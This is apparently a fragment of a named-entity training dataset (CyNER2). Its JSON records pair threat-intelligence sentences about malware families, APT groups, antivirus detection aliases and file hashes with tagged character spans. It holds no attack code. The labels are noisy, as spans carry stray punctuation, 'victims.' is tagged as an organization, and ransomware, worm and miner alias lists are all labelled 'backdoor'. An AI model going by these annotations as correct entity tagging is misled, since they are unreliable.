backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000123", "source": "cyner2_train"}} {"text": "MalwareBytes recently encountered an atypical case of Sundown EK in the wild – usually the landing page is obfuscated, but in this case there was plain JavaScript.", "spans": {"ORGANIZATION: MalwareBytes": [[0, 12]], "MALWARE: Sundown EK": [[54, 64]]}, "info": {"id": "cyner2_train_000124", "source": "cyner2_train"}} {"text": "We have observed this group targeting defense, aerospace, and legal sector companies.", "spans": {"THREAT_ACTOR: group": [[22, 27]], "ORGANIZATION: defense, aerospace,": [[38, 57]], "ORGANIZATION: legal sector companies.": [[62, 85]]}, "info": {"id": "cyner2_train_000128", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.32256.ACD Trojan/PSW.Ruftar.pmc BAT/LockScreen.EB Virus.BAT.Disabler", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000130", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PasswordStealer Trojan.Zusy.D40C66 Win32.Trojan.WisdomEyes.16070401.9500.9505 Trojan.Win32.Steam.exnrza Trojan.Win32.Z.Zusy.517120.A W32.W.AutoRun.lmJt Trojan.PWS.Steam.14964 BehavesLike.Win32.Dropper.hh Trojan.Win32.PSW W32/Trojan.OYNU-3017 PWS:Win32/PWSteal.R!bit Trj/CI.A W32/Delf.ORF!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000131", "source": "cyner2_train"}} {"text": "In recent weeks we've discovered that the group have been actively updating their Clayslide delivery documents, as well as the Helminth backdoor used against victims.", "spans": {"THREAT_ACTOR: group": [[42, 47]], "MALWARE: Helminth backdoor": [[127, 144]], "ORGANIZATION: victims.": [[158, 166]]}, "info": {"id": "cyner2_train_000132", "source": "cyner2_train"}} {"text": "These attacks involved ITG03 actors inserting malware between an ATM and its home bank network, and likely required advanced knowledge of the ATM's network path or prior access to a bank's network.", "spans": 
{"THREAT_ACTOR: ITG03 actors": [[23, 35]], "MALWARE: malware": [[46, 53]], "SYSTEM: ATM": [[65, 68]], "SYSTEM: home bank network,": [[77, 95]], "SYSTEM: ATM's network": [[142, 155]], "SYSTEM: bank's network.": [[182, 197]]}, "info": {"id": "cyner2_train_000133", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.Sileco.IM3 Worm.Palevo.Win32.123726 Trojan/Downloader.Small.aolo Win32.Trojan.Shellcode2EXE.a P2P-Worm.Win32.Palevo.fiqf Trojan.Win32.Palevo.etybtm TrojWare.Win32.TrojanDownloader.Small.aolo0 Trojan:W32/Shell2Exe.A Win32/PatchFile.gk Worm[P2P]/Win32.Palevo TrojanDownloader:Win32/Sileco.A P2P-Worm.Win32.Palevo.fiqf Downloader/Win32.Small.R3049 Worm.Palevo Trojan.Silvana Win32.Trojan.Manualpatched.Dkq Trojan-Downloader.Win32.Sileco Trj/CI.A Win32/Worm.P2P-Worm.fb5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000134", "source": "cyner2_train"}} {"text": "The actors typically steal from financial institutions using targeted malware.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "ORGANIZATION: financial institutions": [[32, 54]], "MALWARE: malware.": [[70, 78]]}, "info": {"id": "cyner2_train_000135", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Nubuler.D Downloader.Small.Win32.102411 Win32.Trojan-Downloader.Small.cj TROJ_NEBULER.SMF Trojan.MulDrop.origin TROJ_NEBULER.SMF BehavesLike.Win32.PWSOnlineGames.kc BDS/WinO.A Trojan:Win32/Nebuler.D Trojan.Nebuler.1 Trojan/Win32.CSon.R566 Nebuler.b Trojan.Win32.Nebuler", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000136", "source": "cyner2_train"}} {"text": "How does Chrysaor work ? 
To install Chrysaor , we believe an attacker coaxed specifically targeted individuals to download the malicious software onto their device .", "spans": {"MALWARE: Chrysaor": [[9, 17], [36, 44]]}, "info": {"id": "cyner2_train_000137", "source": "cyner2_train"}} {"text": "This is due to the fact that the exploit has been integrated into several exploit kits and many end users have not yet patched their machines.", "spans": {}, "info": {"id": "cyner2_train_000138", "source": "cyner2_train"}} {"text": "This research note outlines what we know about the use of Hacking Team's Remote Control System RCS by South Korea's National Intelligence Service NIS.", "spans": {"ORGANIZATION: Hacking Team's": [[58, 72]], "SYSTEM: Remote Control System RCS": [[73, 98]], "ORGANIZATION: South Korea's National Intelligence Service NIS.": [[102, 150]]}, "info": {"id": "cyner2_train_000139", "source": "cyner2_train"}} {"text": "The goal of this paper is to provide some updates to our previous FTA on AlienSpy, the predecessor of JSocket, and to discuss its Android capabilities in detail.", "spans": {"MALWARE: AlienSpy,": [[73, 82]], "MALWARE: JSocket,": [[102, 110]], "SYSTEM: Android": [[130, 137]]}, "info": {"id": "cyner2_train_000140", "source": "cyner2_train"}} {"text": "The first malware program belonging to this family was spotted in May 2016 and was dubbed Linux.DDoS.87.", "spans": {"MALWARE: malware program": [[10, 25]], "MALWARE: family": [[44, 50]]}, "info": {"id": "cyner2_train_000141", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Vbiframe Trojan/Refroso.cwic Trojan.Strictor.D1D61 TROJ_CLICKER.CAQ Win32.Trojan.WisdomEyes.16070401.9500.9939 TROJ_CLICKER.CAQ Win.Trojan.Clicker-3888 Trojan-Clicker.Win32.VBiframe.fgl Virus.Win32.Sality.bgiylc Trojan.Win32.A.Refroso.110901 Troj.Clicker.W32.Vbiframe!c TrojWare.Win32.Downloader.VBIFrame.IK Trojan.Click.25308 Trojan.VBiframe.Win32.382 BehavesLike.Win32.BadFile.cc Trojan-Clicker.Win32.VBiframe 
TrojanClicker.VBiframe.vg Trojan/Win32.Refroso Trojan:Win32/Punad.G Trojan-Clicker.Win32.VBiframe.fgl Trojan/Win32.Clicker.R3068 SScope.Trojan.VBRA.3659 Trj/Clicker.ARC Trojan.DL.Pacoheir!0uqYAwP2RQg Win32/Trojan.Clicker.bd6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000142", "source": "cyner2_train"}} {"text": "This powerful corporate espionage threat is specifically designed to target large enterprises in the technology, pharma, commodities and legal sectors, penetrating their security and exfiltrating commercially sensitive information.", "spans": {"THREAT_ACTOR: corporate espionage threat": [[14, 40]], "ORGANIZATION: large enterprises": [[76, 93]], "ORGANIZATION: technology, pharma, commodities": [[101, 132]], "ORGANIZATION: legal sectors,": [[137, 151]]}, "info": {"id": "cyner2_train_000143", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.ConfickerIOC.Worm Win32.Worm.Conficker.A Worm/W32.Kido.12304 Net-Worm.Win32.Kido!O Worm.Kido.11922 Trojan/Conficker.dam Win32.Worm.Conficker.m W32/Conficker.G W32.Downadup Win32/Conficker.B Win.Trojan.Rootkit-58 Win32.Worm.Conficker.A Net-Worm.Win32.Kido.jq Win32.Worm.Conficker.A Trojan.Win32.Kido.ghbd Worm.Win32.Conficker.4096 Win32.Worm.Conficker.A Trojan:W32/Downadup.AL Win32.HLLW.Autoruner.5555 Worm.Conficker.Win32.405 Net-Worm.Win32.Kido W32/Conficker.UCIE-3981 Worm/Kido.hw Worm[Net]/Win32.Kido Win32.Worm.Conficker.A Net-Worm.Win32.Kido.jq Trojan:WinNT/Conficker.B Win32/Conficker.worm.4096 Win32.Worm.Conficker.A Net-Worm.Kido Rootkit/Conficker.C Win32/Conficker.AA Trojan.Win32.Conficker.dd Worm.Conficker!L/CdK4RT60g Win32/RootKit.Conficker.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000144", "source": "cyner2_train"}} {"text": "Over the past seven months, Unit 42 has been investigating a series of attacks we attribute to a group we have code named Scarlet Mimic. 
The attacks began over four years ago and their targeting pattern suggests that this adversary's primary mission is to gather information about minority rights activists.", "spans": {"ORGANIZATION: Unit 42": [[28, 35]], "THREAT_ACTOR: group": [[97, 102]], "THREAT_ACTOR: Scarlet Mimic.": [[122, 136]], "THREAT_ACTOR: adversary's primary mission": [[222, 249]]}, "info": {"id": "cyner2_train_000148", "source": "cyner2_train"}} {"text": "Recently McAfee labs came across a point-of-sale POS malware that spreads through malicious macros inside a doc file.", "spans": {"ORGANIZATION: McAfee labs": [[9, 20]], "MALWARE: point-of-sale POS malware": [[35, 60]]}, "info": {"id": "cyner2_train_000149", "source": "cyner2_train"}} {"text": "In October 2014, Kaspersky Lab started to research Blue Termite an Advanced Persistent Threat APT targeting Japan.", "spans": {"ORGANIZATION: Kaspersky Lab": [[17, 30]], "THREAT_ACTOR: Blue Termite": [[51, 63]], "THREAT_ACTOR: Advanced Persistent Threat APT": [[67, 97]]}, "info": {"id": "cyner2_train_000150", "source": "cyner2_train"}} {"text": "Just in May, we pointed out how it had gone through six separate versions with various differences in its routines.", "spans": {}, "info": {"id": "cyner2_train_000151", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Spy.Bancos.if Trojan.Heur.EED312 TROJ_BANKER.BTB Win32.Trojan.Bancos.a Infostealer.Bancos TROJ_BANKER.BTB Win.Trojan.Bancos-122 Trojan-Banker.Win32.Bancos.if Trojan.Win32.Bancos.gaxc Troj.Banker.W32.Bancos.if!c TrojWare.Win32.Spy.Bancos.U Trojan.Bancos.Win32.1340 Trojan:Win32/Vlight.A TR/Spy.Bancos.IF Trojan[Banker]/Win32.Bancos Win32.Troj.Bancos.if.kcloud Trojan:Win32/Vlight.A Trojan-Banker.Win32.Bancos.if Win32.Trojan-banker.Bancos.Eehf Trojan.PWS.Bancos.OGQ Trojan-Banker.Win32.Bancos W32/Bancos.NJN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000152", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.AP3 
TROJ_VBNA.SMD Win32.Trojan.Paskod.a TROJ_VBNA.SMD Trojan.Win32.Dynamer.lpd Trojan.Win32.Dynamer.exrxxx Trojan.Win32.Z.Paskod.114692.A Troj.W32.Dynamer.mqvJ TrojWare.Win32.Paskod.D Trojan.DownLoader11.38900 Trojan.Dynamer.Win32.5199 Trojan.Win32.Paskod Trojan/Dynamer.cli TrojanDownloader:Win32/Tinub.A Trojan.Heur.VB.E4CDDB Trojan.Win32.Dynamer.lpd Trojan/Win32.VBCrypt.R122576 BScope.Trojan.Diple Trj/GdSda.A Win32.Trojan.Dynamer.Tcbz W32/Paskod.E!tr Win32/Trojan.ff1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000154", "source": "cyner2_train"}} {"text": "One malware family seen in such attacks is known as SamSa', Samas', samsam', or most recently, MOKOPONI'.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: SamSa', Samas', samsam',": [[52, 76]], "MALWARE: MOKOPONI'.": [[95, 105]]}, "info": {"id": "cyner2_train_000156", "source": "cyner2_train"}} {"text": "It seems to be part of a larger campaign, known as Pawn Storm", "spans": {"THREAT_ACTOR: campaign,": [[32, 41]], "THREAT_ACTOR: Pawn Storm": [[51, 61]]}, "info": {"id": "cyner2_train_000157", "source": "cyner2_train"}} {"text": "Windows malware, also detected as: Trojan.Autoit, Trojan.Symmi.D10095, Trojan.Win32.Autoit.exnvng, Trojan.Win32.Z.Autoit.1079042, Troj.W32.Autoit!c, Trojan.Inject1.38999, Trojan.AutoIt.Win32.7, BehavesLike.Win32.Trojan.th, Trojan.Win32.Eupuds, Trojan.Autoit.ixi, Trojan:Win32/BrobanEup.A, Trojan.Autoit.Banker, Win32.Trojan.Autoit.Szbl, W32/Autoit.AAV!tr, Win32/Trojan.839,", "spans": {"MALWARE: Windows malware,": [[0, 16]]}, "info": {"id": "cyner2_train_000158", "source": "cyner2_train"}} {"text": "The campaign has many stages of the infection chain and all needed to be unraveled before the final payload level was reached.", "spans": {}, "info": {"id": "cyner2_train_000159", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.InterneC.Worm Trojan.Downloader.VB.VRF Trojan-PWS/W32.WebGame.24576.IS Trojan.VB.Win32.91134 
Troj.GameThief.W32.OnLineGames.tqmr!c Trojan/VB.nti TROJ_DLOAD.FH W32/Worm.AUBX TROJ_DLOAD.FH Win.Spyware.56255-2 Trojan.Downloader.VB.VRF Trojan.Downloader.VB.VRF Trojan.Win32.OnLineGames.tibz Trojan.Win32.PSWIGames.24576.GZ Trojan.Downloader.VB.VRF Trojan.Downloader.VB.VRF Trojan.DownLoader.55879 BehavesLike.Win32.Trojan.mz W32/Worm.EUBY-4599 Trojan/PSW.OnLineGames.asrj TR/PSW.OnlineGames.tqmr Trojan[GameThief]/Win32.OnLineGames Trojan.Downloader.VB.VRF Trojan/Win32.OnlineGameHack.C140754 Trojan.Downloader.VB.VRF TrojanPSW.OnLineGames.a Win32.Trojan-GameThief.Onlinegames.inv Trojan.Mansund!mgpvcbFSAhU Trojan-GameThief.Win32.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000160", "source": "cyner2_train"}} {"text": "Indicators of Compromise ( IoCs ) SHA256 Detection e394e53e53cd9047d6cff184ac333ef7698a34b777ae3aac82c2c669ef661dfe AndroidOS_SpyAgent.HRXB e8d4713e43241ab09d40c2ae8814302f77de76650ccf3e7db83b3ac8ad41f9fa AndroidOS_ProjectSpy.HRX 29b0d86ae68d83f9578c3f36041df943195bc55a7f3f1d45a9c23f145d75af9d AndroidOS_ProjectSpy.HRX 3a15e7b8f4e35e006329811a6a2bf291d449884a120332f24c7e3ca58d0fbbdb IOS_ProjectSpy.A URLs cashnow [ .", "spans": {}, "info": {"id": "cyner2_train_000161", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader Win32/Tnega.CfCAeIB Win.Trojan.Downloader-64707 Application.Win32.Kuaiba.BC Trojan.DownLoader10.13268 BehavesLike.Win32.Downloader.tc Win32.Trojan-Downloader.GMUnpackerInstaller.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000164", "source": "cyner2_train"}} {"text": "Though there were multiple waves of messages following a similar tactic, each one carried the same malicious .doc file as an attachment SHA256: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e.", "spans": {}, "info": {"id": "cyner2_train_000165", "source": "cyner2_train"}} {"text": "The actor has used several notable techniques in these incidents such as 
sniffing passwords from Wi-Fi traffic, poisoning the NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.", "spans": {"THREAT_ACTOR: The actor": [[0, 9]], "MALWARE: the EternalBlue exploit.": [[176, 200]]}, "info": {"id": "cyner2_train_000167", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Troj.Undef.kcloud Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000168", "source": "cyner2_train"}} {"text": "During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload.", "spans": {"MALWARE: Komplex": [[40, 47], [203, 210]], "THREAT_ACTOR: attack campaign": [[71, 86]], "ORGANIZATION: individuals": [[97, 108]], "SYSTEM: OS X": [[117, 121]], "VULNERABILITY: exploited a vulnerability": [[127, 152]], "VULNERABILITY: MacKeeper antivirus application": [[160, 191]], "MALWARE: payload.": [[216, 224]]}, "info": {"id": "cyner2_train_000169", "source": "cyner2_train"}} {"text": "A backdoor also known as: W64/Risk.SHRD-0827 Riskware.Win64.Pwdump.bjsgmx Tool.Pwdump.80 W64/MalwareF.NVZY SPR/Tool.174080.1 Trojan[PSWTool]/Win32.CacheDump PUP.Optional.PasswordDump Trj/CI.A Riskware.Pwdump! 
not-a-virus:PSWTool.Win32.PWDump", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000170", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_DROPER.SMIA Win32.Trojan-Dropper.Delf.ay W32/Backdoor.WJXY-0415 Win32/Tnega.IX TROJ_DROPER.SMIA Trojan.Win32.Delf.cvuwsq Backdoor.Win32.ProRat.~O Trojan.Inject.5089 W32/Backdoor2.DVXL TrojanDropper:Win32/Amighelo.A Trojan.Heur.ED7518 Trojan.Win32.PSWIGames.1110528 Trojan.Amighelo Win32/TrojanDropper.Delf.NOD Trojan-Dropper.Win32.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000171", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9770 Trojan.FakeAV.13061 Worm:Win32/Gnoewin.A W32.W.Otwycal.l4av Win32/RiskWare.PEMalform.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000173", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.BitMiner Trojan.Zusy.D41F53 Tool.BtcMine.1195 Backdoor.PePatch.Win32.108542 BehavesLike.Win32.Backdoor.th PUA.CoinMiner RiskTool.BitMiner.au RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win32/Optiminz.A Unwanted/Win32.BitCoinMiner.R215923 Trj/CI.A Win32/Virus.RiskTool.435", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000174", "source": "cyner2_train"}} {"text": "The malware checks for sinkholing of its control servers before each network communication session and does not initiate its malicious activities—such as downloading and running the malicious payloads—if it thinks the Domain Name Service DNS records have been sinkholed.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: malicious": [[125, 134]], "MALWARE: malicious payloads—if": [[182, 203]], "SYSTEM: Domain Name Service DNS": [[218, 241]]}, "info": {"id": "cyner2_train_000176", "source": "cyner2_train"}} {"text": "However, the recent activity caught our attention due to a change to the URL structure of the landing pages.", "spans": {}, 
"info": {"id": "cyner2_train_000177", "source": "cyner2_train"}} {"text": "When running, the Kronos payload will download several other pieces of malware, but the one that caught our eye is a new credit card dumper with very low detection.", "spans": {"MALWARE: Kronos payload": [[18, 32]], "MALWARE: malware,": [[71, 79]], "MALWARE: credit card dumper": [[121, 139]]}, "info": {"id": "cyner2_train_000180", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ursnif.100315 Trojan.Filecoder.Win32.1880 Uds.Dangerousobject.Multi!c TROJ_HPROVNIX.SM Win32.Trojan.WisdomEyes.16070401.9500.9985 Ransom.Cryptolocker TROJ_HPROVNIX.SM Trojan-Ransom.Win32.Snocry.dmd Trojan.Win32.Encoder.eaaxms Trojan.Win32.Z.Razy.262660 Trojan.Encoder.3689 BehavesLike.Win32.VirRansom.dh W32/Trojan.RVGU-3177 Trojan.Cryptolocker.c TR/WinPlock.262656 Trojan[Ransom]/Win32.Cryptolocker Ransom:Win32/WinPlock.A Trojan.Razy.D2A0E Trojan-Ransom.Win32.Snocry.dmd Trojan/Win32.CryptoWall.R173903 Trojan.Ransom.cryptolocker Ransom.FileCryptor Trj/GdSda.A Win32/Filecoder.NFJ Win32.Trojan.Filecoder.Wncw Trojan.Cryptolocker! 
Trojan.Win32.Filecoder W32/HPROVNIX.SM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000181", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9960 Virus.Win32.Virut W32.Dropper.Dunik", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000182", "source": "cyner2_train"}} {"text": "However, the malware is flexible enough to grant access to all the resources in the victim's computer.", "spans": {"MALWARE: malware": [[13, 20]], "SYSTEM: victim's computer.": [[84, 102]]}, "info": {"id": "cyner2_train_000183", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Hexzone.352256 Trojan-Ransom.Win32.Hexzone.1!O Trojan.Hexzone Win32.Trojan.WisdomEyes.16070401.9500.9952 Trojan.Hexzone Ransom_Hexzone.R002C0DAD18 Trojan.Win32.Hexzone.ewziqv Trojan.Win32.Hexzone.352256 Troj.Ransom.W32.Hexzone!c TrojWare.Win32.Ransom.Hexzone.~jap3 Trojan.Blackmailer.454 Ransom_Hexzone.R002C0DAD18 Trojan-Ransom.Win32.Hexzone Trojan.Hexzone.q Trojan[Ransom]/Win32.Hexzone Adware.Heur.E6B8C4 Adware.Vundo/Variant-LIB Trojan:Win32/Hexzone.A!dll Trojan/Win32.Hexzone.R6919 Win32/Hexzone.I Trojan.Hexzone!FZcXjlI3fIw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000184", "source": "cyner2_train"}} {"text": "Further investigation of GhostPush revealed more recent variants, which, unlike older ones, employ the following routines that make them harder to remove and detect:", "spans": {"MALWARE: GhostPush": [[25, 34]], "MALWARE: variants,": [[56, 65]]}, "info": {"id": "cyner2_train_000185", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Downloader.Intexp.c Win32.Trojan.WisdomEyes.16070401.9500.9782 W32/Downloader.AJWJ Adware.IEPlugin Win.Downloader.64050-1 Trojan-Downloader.Win32.Intexp.c Trojan.Win32.Intexp.didb Trojan.Win32.Downloader.33280.AKE Troj.Downloader.W32.Intexp.c!c Win32.Trojan-downloader.Intexp.Alsx 
TrojWare.Win32.TrojanDownloader.Intexp.C Trojan.DownLoader.2369 Downloader.Intexp.Win32.13 BehavesLike.Win32.Koobface.nc Trojan-Downloader.Win32.OneClickNetSearch W32/Downloader.XUJA-4048 TrojanDownloader.Intexp.c W32.Malware.Downloader TR/Dldr.Intexp.B Trojan[Downloader]/Win32.Intexp Win32.TrojDownloader.Intexp.c.kcloud Trojan.Graftor.Elzob.DF6F Trojan-Downloader.Win32.Intexp.c TrojanDownloader:Win32/Intexp.C Trojan/Win32.HDC.C83257 TrojanDownloader.Intexp Win32/TrojanDownloader.Intexp.C Trojan.DL.Intexp!uQMofoaT248 W32/Malware_fam.NB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000187", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Multi Trojan.Win32.VB.dmoq Trojan.Win32.VB.ewrjie Trojan.Win32.Z.Camec.51712 Uds.Dangerousobject.Multi!c Win32.Trojan.Vb.Llgx BehavesLike.Win32.Trojan.qc Trojan/Win32.VB Trojan.Win32.VB.dmoq Trojan:Win32/Camec.B Trj/GdSda.A Trojan.Win32.Camec Win32/Trojan.7b5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000190", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Delf.Win32.27191 Trojan/Delf.ahzk Trojan.Zusy.D3A909 Win32.Backdoor.Lukicsel.c Win32/Bifrose.AAB Win.Spyware.80655-2 W32.Lamer.lwJ1 TrojWare.Win32.Trojan.Lukicsel.~Q Trojan.MulDrop1.48720 BehavesLike.Win32.Eggnog.fc Trojan/Delf.qyz Trojan/Win32.Delf TrojanDropper:Win32/Lukicsel.B Trojan.Win32.Delf.364544.B Trojan.Delf Win32/Lukicsel.Q W32/Crypt.NTAB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000191", "source": "cyner2_train"}} {"text": "The use of adult-themed content echoes the one-click billing fraud app we've covered a few years back.", "spans": {}, "info": {"id": "cyner2_train_000193", "source": "cyner2_train"}} {"text": "SHA256 Package Name App Name a6c7351b09a733a1b3ff8a0901c5bde fdc3b566bfcedcdf5a338c3a97c9f249b com.android.henbox 备份 ( Backup ) Table 3 HenBox variant used in description Once this variant of HenBox is installed on the 
victim ’ s device , the app can be executed in two different ways : One method for executing HenBox is for the victim to launch the malicious app ( named “ Backup ” , in this instance ) from the launcher view on their device , as shown in Figure 3 below .", "spans": {"MALWARE: HenBox": [[136, 142], [192, 198], [312, 318]]}, "info": {"id": "cyner2_train_000195", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.MSIL Backdoor.Telebot BKDR_TELEBOT.VBV Win.Trojan.Nyetya-6332125-0 Backdoor.Msil.Teledoor!c Win32.Trojan.Telebot.Acxl BackDoor.Medoc.2 Trojan.TeleDoor.Win32.2 BKDR_TELEBOT.VBV Backdoor.Teledoor W32/Trojan.RZZO-3107 Backdoor.MSIL.ojt W32.Backdoor.Medoc TR/TeleDoor.ME.1 Trojan[Backdoor]/MSIL.TeleDoor Trojan/Win32.TeleDoor.C2029730 Backdoor.MSIL.Telebot Bck/Teledoors.A Trojan.TeleDoor!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000196", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.BitMin.Win32.519 Trojan.Strictor.D1BA5D Trojan.Script.AutoIt.emewzp Trojan.BtcMine.1084 BehavesLike.Win32.BadFile.wc TR/BitCoinMiner.zzzlc Trojan/Win32.BitMin.C1728272 Trojan.Win32.Autoit Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000197", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/PSWSpider.E Backdoor.Bancodor.M Backdoor.Bancodor.M Backdoor.Bancodor.M Backdoor/Bancodor.m Backdoor.Bancodor.M W32/Bancodor.T@bd Backdoor.Badcodor Win32/Bancodor.M BKDR_BANCODOR.M Win.Trojan.Bancodor-27 Backdoor.Win32.Bancodor.m Trojan.Win32.Bancodor.dbrs Backdoor.Win32.Bancodor.513024[h] Backdoor.W32.Bancodor.m!c Backdoor.Bancodor.M Backdoor.Win32.Bancodor.~O Backdoor.Bancodor.M Trojan.Bancdo Backdoor.Bancodor.Win32.40 BKDR_BANCODOR.M W32/Bancodor.UWGT-1776 Backdoor/Bancodor.ak BDS/Bancodor.M.1 Trojan[Backdoor]/Win32.Bancodor Backdoor.Bancodor.M Backdoor:Win32/Bancodor.M Win-Trojan/Bancodor.513024.C Backdoor.Bancodor Bck/Bancodor.E Win32.Backdoor.Bancodor.Oyep 
Backdoor.Bancodor!IZl0vEMNH4U Backdoor.Win32.Bancodor Backdoor.Bancodor.M BackDoor.Bancodor.AS Backdoor.Win32.Bancodor.m", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000198", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper.GreenStuff.1.7 Win32.Trojan.WisdomEyes.16070401.9500.9688 Trojan.Dropper Win32/Pasorot.D Win.Trojan.Greenstuff-3 Trojan.Dropper.GreenStuff.1.7 Trojan-Dropper.Win32.GreenStuff.17 Trojan.Dropper.GreenStuff.1.7 Troj.Dropper.W32.GreenStuff.17!c Win32.Trojan-dropper.Greenstuff.Ebgv Trojan.Dropper.GreenStuff.1.7 TrojWare.Win32.TrojanDropper.GreenStuff.17 Trojan.Dropper.GreenStuff.1.7 Trojan.MulDrop.365 Dropper.GreenStuff.Win32.14 BehavesLike.Win32.Trojan.dc W32/Trojan.KLUP-2808 TrojanDropper.Exebinder TR/Pasorot.g Trojan[PSW]/Win32.Pasorot Trojan.Dropper.GreenStuff.1.7 Trojan-Dropper.Win32.GreenStuff.17 TrojanDropper:Win32/GreenStuff.1_7 Trojan/Win32.Downloader.C112567 TScope.Malware-Cryptor.SB Trj/Dropper.WF Win32/TrojanDropper.GreenStuff.17 W32/GreenSt.B!tr.dr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000201", "source": "cyner2_train"}} {"text": "A backdoor also known as: MemScan:Trojan.Downloader.Modgof.A MemScan:Trojan.Downloader.Modgof.A Trojan.Scar.daok Trojan.Win32.Scar.tlmwj TROJ_AZAH.A Trojan.Win32.Scar.daok MemScan:Trojan.Downloader.Modgof.A Trojan.Scar!ZI1ghG8RGXc MemScan:Trojan.Downloader.Modgof.A Trojan.MulDrop1.43719 TROJ_AZAH.A Win32.Troj.Scar.kcloud Trojan.Win32.A.Downloader.120320.DL MemScan:Trojan.Downloader.Modgof.A Worm.Win32.FakeFolder.b W32/AZAH.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000202", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.FakeGina.X Trojan.Fakegina Trojan.FakeGina.X Trojan/FakeGina.b TROJ_FAKEGINA.AA Win32.Trojan.FakeGina.b W32/Risk.LOJP-2889 Trojan.Fakegina TROJ_FAKEGINA.AA Trojan.FakeGina.X Trojan.FakeGina.X Trojan.FakeGina.X TrojWare.Win32.FakeGina.~B 
Trojan.FakeGina.X Trojan.FakeGina.Win32.121 Trojan.Win32.FakeGina W32/MalwareF.NCOX Trojan/Win32.FakeGina Trojan.FakeGina.X Trojan:Win32/Fakegina.T Trojan/Win32.FakeGina.R77324 Win32/FakeGina.B Win32.Trojan.Fakegina.Wmst W32/FakeGina.AA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000204", "source": "cyner2_train"}} {"text": "The campaign targeted Japanese organizations by using at least two legitimate Japanese websites to host a strategic web compromise SWC, where victims ultimately downloaded a variant of the SOGU malware.", "spans": {"MALWARE: campaign": [[4, 12]], "ORGANIZATION: Japanese organizations": [[22, 44]], "MALWARE: SOGU malware.": [[189, 202]]}, "info": {"id": "cyner2_train_000206", "source": "cyner2_train"}} {"text": "It connects to a certain URL, likely controlled by the attacker, using a specific Go user-agent:", "spans": {"SYSTEM: Go user-agent:": [[82, 96]]}, "info": {"id": "cyner2_train_000207", "source": "cyner2_train"}} {"text": "The first phase is receiving malspam from a botnet.", "spans": {"MALWARE: botnet.": [[44, 51]]}, "info": {"id": "cyner2_train_000208", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D49E51 W32/Trojan.ULWD-7621 